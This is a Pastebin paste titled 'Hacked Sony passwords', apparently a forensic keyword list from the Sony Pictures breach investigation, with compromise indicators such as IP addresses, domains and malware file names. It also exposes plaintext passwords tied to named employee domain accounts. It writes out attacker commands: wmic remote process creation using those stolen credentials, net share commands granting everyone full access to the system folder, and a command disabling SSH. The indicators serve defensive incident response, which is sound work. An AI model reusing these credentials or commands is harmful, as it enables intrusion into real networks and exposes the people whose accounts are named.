Guest User

Hacked Sony passwords

a guest
Mar 19th, 2018
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 9.30 KB | None | 0 0
  1. /user/ericscales/spe/NK_SPE_keywords.txt
  2. KeywordClass
  3. 1
  4. keywords
  5. 1 1
  6. p n t pc pu pb p8 p7 pg an ph or di um st ww pr lo ta cp
  7. 1 1
  8. 7 r
  9. 1 9
  10. 7 Keyword r
  11. 1 10
  12. 3 Accounts r
  13. 1 0
  14. 2 Dayals-1 1 1 r
  15. 1 0
  16. 2 JHKim4-1 1 1 r
  17. 1 0
  18. 2 KManku-1 1 1 r
  19. 1 0
  20. 2 MMcLean3-1 1 1 r
  21. 1 0
  22. 2 jhkim-1 1 1 r
  23. 1 0
  24. 2 dhenderson-1 1 1 r
  25. 1 0
  26. 2 cmonti-1 1 1 r
  27. 1 0
  28. 2 ADutta2-1 1 1 r
  29. 1 0
  30. 2 rimageservice 1 1 r
  31. 1 0
  32. 2 mdurrani 1 1 r
  33. 1 5
  34. 7 Carve r
  35. 1 0
  36. EXEs \x4D\x5A\x90\x00\x03\x00\x00\x00 1 1 r
  37. 1 0
  38. Registry Hive Header (regf) \x72\x65\x67\x66 1 1 r
  39. 1 0
  40. Registry Hive 4KB bin (hbin) \x68\x62\x69\x6e 1 1 r
  41. 1 0
  42. File Entries (FILE0) \x46\x49\x4C\x45\x30 1 1 r
  43. 1 0
  44. INDX Entries \x49\x4e\x44\x58 1 1 r
  45. 1 12
  46. 7 Day 0 r
  47. 1 10
  48. 3 NBIs r
  49. 1 0
  50. 2 93.157.14.154 1 1 r
  51. 1 0
  52. 2 165.138.120.25 1 1 r
  53. 1 0
  54. 2 209.237.95.19 1 1 r
  55. 1 0
  56. 2 213.42.82.243 1 1 r
  57. 1 0
  58. 2 124.47.73.194 1 1 r
  59. 1 0
  60. 2 62.141.29.175 1 1 r
  61. 1 0
  62. 2 65.117.146.5 1 1 r
  63. 1 0
  64. 2 187.176.34.40 1 1 r
  65. 1 0
  66. 2 101.76.99.183 1 1 r
  67. 1 0
  68. 2 211.76.87.252 1 1 r
  69. 1 0
  70. 2 install-sunny-leone-II-screensaver.exe install-sunny-leone-II-screensaver.exe 1 1 r
  71. 1 0
  72. 2 tmsn.exe tmsn.exe 1 1 r
  73. 1 0
  74. 2 netmonsvc.dll netmonsvc.dll 1 1 r
  75. 1 0
  76. 2 tmscompg.msi tmscompg.msi 1 1 r
  77. 1 0
  78. 2 NetMonSvc NetMonSvc 1 1 r
  79. 1 0
  80. 2 NetWork Moniter Services NetWork Moniter Services 1 1 r
  81. 1 0
  82. 2 cvrit000.bat cvrit000.bat 1 1 r
  83. 1 0
  84. 2 sunny-leone-II-screensaver.scr sunny-leone-II-screensaver.scr 1 1 r
  85. 1 0
  86. 2 1.JPG 1.JPG 1 1 r
  87. 1 0
  88. 2 2.JPG 2.JPG 1 1 r
  89. 1 0
  90. 2 3.JPG. 3.JPG. 1 1 r
  91. 1 24
  92. 3 NBIs r
  93. 1 0
  94. 2 217.96.33.164 1 1 r
  95. 1 0
  96. 2 203.131.222.102 1 1 r
  97. 1 0
  98. 2 88.53.215.64 1 1 r
  99. 1 0
  100. 2 212.31.102.100 1 1 r
  101. 1 0
  102. 2 58.185.154.99 1 1 r
  103. 1 0
  104. 2 200.87.126.116 1 1 r
  105. 1 0
  106. 2 www.ntcnt.ru 1 1 r
  107. 1 0
  108. 2 93.191.62.154 1 1 r
  109. 1 0
  110. 2 www.thammasatpress.com 1 1 r
  111. 1 0
  112. 2 203.150.230.72 1 1 r
  113. 1 0
  114. 2 moodle.universidadebematech.com.br 1 1 r
  115. 1 0
  116. 2 200.186.46.59 1 1 r
  117. 1 0
  118. 2 173.230.140.245 1 1 r
  119. 1 0
  120. 2 175.45.178.19 1 1 r
  121. 1 0
  122. 2 192.81.128.82 1 1 r
  123. 1 0
  124. 2 220.88.177.66 1 1 r
  125. 1 0
  126. 2 118.163.116.196 1 1 r
  127. 1 0
  128. 2 203.131.222.109 1 1 r
  129. 1 0
  130. 2 175.111.4.6 1 1 r
  131. 1 0
  132. 2 140.136.134.109 1 1 r
  133. 1 0
  134. 2 142.177.194.101 1 1 r
  135. 1 0
  136. 2 151.13.173.99 1 1 r
  137. 1 0
  138. 2 65.49.2.182 1 1 r
  139. 1 0
  140. 2 124.66.152.30 1 1 r
  141. 1 21
  142. 7 Opp Notes r
  143. 1 0
  144. 2 comon32 comon32 1 1 r
  145. 1 0
  146. 2 diskpartmgr16 diskpartmgr16 1 1 r
  147. 1 0
  148. 2 dpnsvr16 dpnsvr16 1 1 r
  149. 1 0
  150. 2 hwrcompsvc64 hwrcompsvc64 1 1 r
  151. 1 0
  152. 2 recdisc32 recdisc32 1 1 r
  153. 1 0
  154. 2 mobsynclm64 mobsynclm64 1 1 r
  155. 1 0
  156. 2 taskhosts64.exe Command 1 wmic.exe /node:"SPCONCAC1035461" /user:"spe\jhkim-1" /password:"DE$Ktop12" PROCESS CALL CREATE "\\SPCONCAC1035461\admin$\system32\taskhosts64.exe" 1 1 r
  157. 1 0
  158. 2 taskhosts64.exe Command 2 \\SPTVASG51010344\admin$\system32\taskhosts64.exe 1 1 r
  159. 1 0
  160. 2 taskhosts64.exe Command 3 wmic.exe /node:"172.22.179.57" /user:"spe\jhkim-1" /password:"DE$Ktop12" PROCESS CALL CREATE "\\172.22.179.57\admin$\system32\taskhosts64.exe" > 1701901378_11532 1 r
  161. 1 0
  162. 2 mobsynclm64.exe Command 1 \SPTVEMA50005496\admin$\system32\mobsynclm64.exe 1 1 r
  163. 1 0
  164. 2 mobsynclm64.exe Command 2 wmic.exe /node:"SPTVEMA50005496" /user:"spe\dhenderson-1" /password:"(Ba773l35)" PROCESS CALL CREATE "\\SPTVEMA50005496\admin$\system32\mobsynclm64.exe" > 1702864294_644 1 1 r
  165. 1 0
  166. 2 recdisc32.exe Command 1 wmic.exe /node:"172.18.57.200" /user:"spe\dhenderson-1" /password:"(Ba773l35)" PROCESS CALL CREATE "\\172.18.57.200\admin$\system32\recdiscm32.exe" > 1693269608_8260 1 1 r
  167. 1 0
  168. 2 hwrcompsvc64.exe Command 1 /node:"SPETWVDSKPRB19" /user:"SPE\cmonti-1" /password:"Minion#1" PROCESS CALL CREATE "\\SPETWVDSKPRB19\admin$\system32\hwrcompsvc64.exe" 1 1 r
  169. 1 0
  170. 2 hwrcompsvc64.exe Command 2 /node:"SPHEEPA50007614" /user:"SPE\cmonti-1" /password:"Minion#1" PROCESS CALL CREATE "\\SPHEEPA50007614\admin$\system32\hwrcompsvc64.exe" 1 1 r
  171. 1 0
  172. 2 dpnsvr16.exe Command 1 "SPE\cmonti-1" /password:"Minion#1" PROCESS CALL CREATE "\\SPCONMHC1030836\admin$\system32\dpnsvr16.exe" > 1691533239_8104 1 1 r
  173. 1 0
  174. 2 diskpartmgr16.exe Command 1 wmic.exe /node:"172.24.249.36" /user:"SPE\cmonti-1" /password:"Minion#1" PROCESS CALL CREATE "\\172.24.249.36\admin$\system32\diskpartmg16.exe" > 1689370800_14860 1 1 r
  175. 1 0
  176. 2 comon32.exe Command 1 /node:"SPCONSPC1035060" /user:"SPE\cmonti-1" /password:"Minion#1" PROCESS CALL CREATE "\\SPCONSPC1035060\admin$\system32\comon32.exe" 1 1 r
  177. 1 0
  178. 2 comon32.exe Command 2 /node:"172.27.41.62" /user:"spe\dhenderson-1" /password:"(Ba773l35)" PROCESS CALL CREATE "\\172.27.41.62\admin$\system32\comon32.exe" 1 1 r
  179. 1 0
  180. 2 dhenderson Password "(Ba773l35)" 1 1 r
  181. 1 0
  182. 2 jhkim-1 Password "DE$Ktop12" 1 1 r
  183. 1 0
  184. 2 cmonti-1 Password "Minion#1" 1 1 r
  185. 1 9
  186. 7 Other Malware r
  187. 1 0
  188. 2 kph.sys kph.sys 1 1 r
  189. 1 0
  190. 2 ams.exe \ams.exe 1 1 r
  191. 1 0
  192. 2 lsremora64.dll lsremora64.dll 1 1 r
  193. 1 0
  194. 2 1.log \1.log 1 1 r
  195. 1 0
  196. 2 re5.txt \re5.txt 1 1 r
  197. 1 0
  198. 2 lionhearted lionhearted 1 1 r
  199. 1 0
  200. 2 troy.dll troy.dll 1 1 r
  201. 1 0
  202. 2 tdll.dll tdll.dll 1 1 r
  203. 1 0
  204. 2 TMP1.nms TMP1.nms 1 1 r
  205. 1 6
  206. 7 Passwords r
  207. 1 0
  208. 2 Dayals-1 Password London13! 1 1 r
  209. 1 0
  210. 2 JHKim4-1 Password !Tomorrow33 1 1 r
  211. 1 0
  212. 2 KManku-1 Password M@nday77 1 1 r
  213. 1 0
  214. 2 MMcLean3-1 Password @Smiley91 1 r
  215. 1 0
  216. 2 Password from 2618dd3e5c59ca851f03df12c0cab3b8 P@ssw0rd123 1 1 r
  217. 1 0
  218. 2 jhkim-1 password DE$Ktop12 1 1 r
  219. 1 35
  220. 7 TINYFUSE Malware r
  221. 1 0
  222. 2 WinsSchMgmt Service WinsSchMgmt 1 1 r
  223. 1 0
  224. 2 Windows Schedule Management Service Windows Schedule Management Service 1 1 r
  225. 1 0
  226. 2 RasMgrp GETTICKCOUNT RasMgrp 1 1 r
  227. 1 0
  228. 2 RasSecruity RasSecruity 1 1 r
  229. 1 0
  230. 2 Remote Command 1 cmd.exe /q /c net share shared$=%SystemRoot% /GRANT:everyone,FULL 1 1 r
  231. 1 0
  232. 2 Remote Command 2 cmd.exe /q /c net share shared$=%SystemRoot% 1 1 r
  233. 1 0
  234. 2 WMI Command cmd.exe /c wmic.exe /node:"<TARGET>" /user:"<USER>" /password:"<PASSWORD>" PROCESS CALL CREATE "<malware_name>" > <gettickcount()>_<TID> 1 1 r
  235. 1 0
  236. 2 Remote Command 3 cmd.exe /q /c net share shared$ /delete 1 1 r
  237. 1 0
  238. 2 Dayals-1 Username SPE\Dayals-1 1 1 r
  239. 1 0
  240. 2 JHKim4-1 Username SPE\JHKim4-1 1 1 r
  241. 1 0
  242. 2 KManku-1 Username SPE\KManku-1 1 1 r
  243. 1 0
  244. 2 MMcLean3-1 Username SPE\MMcLean3-1 1 1 r
  245. 1 0
  246. 2 igfxtrayex.exe igfxtrayex.exe 1 1 r
  247. 1 0
  248. 2 brmgmtsvc Service brmgmtsvc 1 1 r
  249. 1 0
  250. 2 dpnsvr16.exe dpnsvr16.exe 1 1 r
  251. 1 0
  252. 2 expandmn32.exe expandmn32.exe 1 1 r
  253. 1 0
  254. 2 hwrcompsvc64.exe hwrcompsvc64.exe 1 1 r
  255. 1 0
  256. 2 mobsynclm64.exe mobsynclm64.exe 1 1 r
  257. 1 0
  258. 2 rdpshellex32.exe rdpshellex32.exe 1 1 r
  259. 1 0
  260. 2 recdiscm32.exe recdiscm32.exe 1 1 r
  261. 1 0
  262. 2 taskchg16.exe taskchg16.exe 1 1 r
  263. 1 0
  264. 2 taskhosts64.exe taskhosts64.exe 1 1 r
  265. 1 0
  266. 2 Function UpzRhu UpzRhu 1 1 r
  267. 1 0
  268. 2 Function YspAQq YspAQq 1 1 r
  269. 1 0
  270. 2 deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly 1 1 r
  271. 1 0
  272. 2 inflate 1.2.3 Copyright 1995-2005 Mark Adler inflate 1.2.3 Copyright 1995-2005 Mark Adler 1 1 r
  273. 1 0
  274. 2 fHello World! \fHello World! 1 1 r
  275. 1 0
  276. 2 Log File net_ver.dat 1 1 r
  277. 1 0
  278. 2 iissvr.exe iissvr.exe 1 1 r
  279. 1 0
  280. 2 net_ver.dat net_ver.dat 1 1 r
  281. 1 0
  282. 2 usbdrv3.sys usbdrv3.sys 1 1 r
  283. 1 0
  284. 2 Backup and Restore Management Service Backup and Restore Management Service 1 1 r
  285. 1 0
  286. 2 Malware Output ([A-Z][0-9]+)\|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\|(1|2) 1 1 r
  287. 1 0
  288. 2 index.wav index.wav 1 1 r
  289. 1 0
  290. 2 brmgmtsvc brmgmtsvc 1 1 r
  291. 1 2
  292. 7 UNIX Malware r
  293. 1 0
  294. 2 monit.sh monit.sh 1 1 r
  295. 1 0
  296. 2 svcadm disable ssh svcadm disable ssh 1 1 r
Add Comment
Please, Sign In to add comment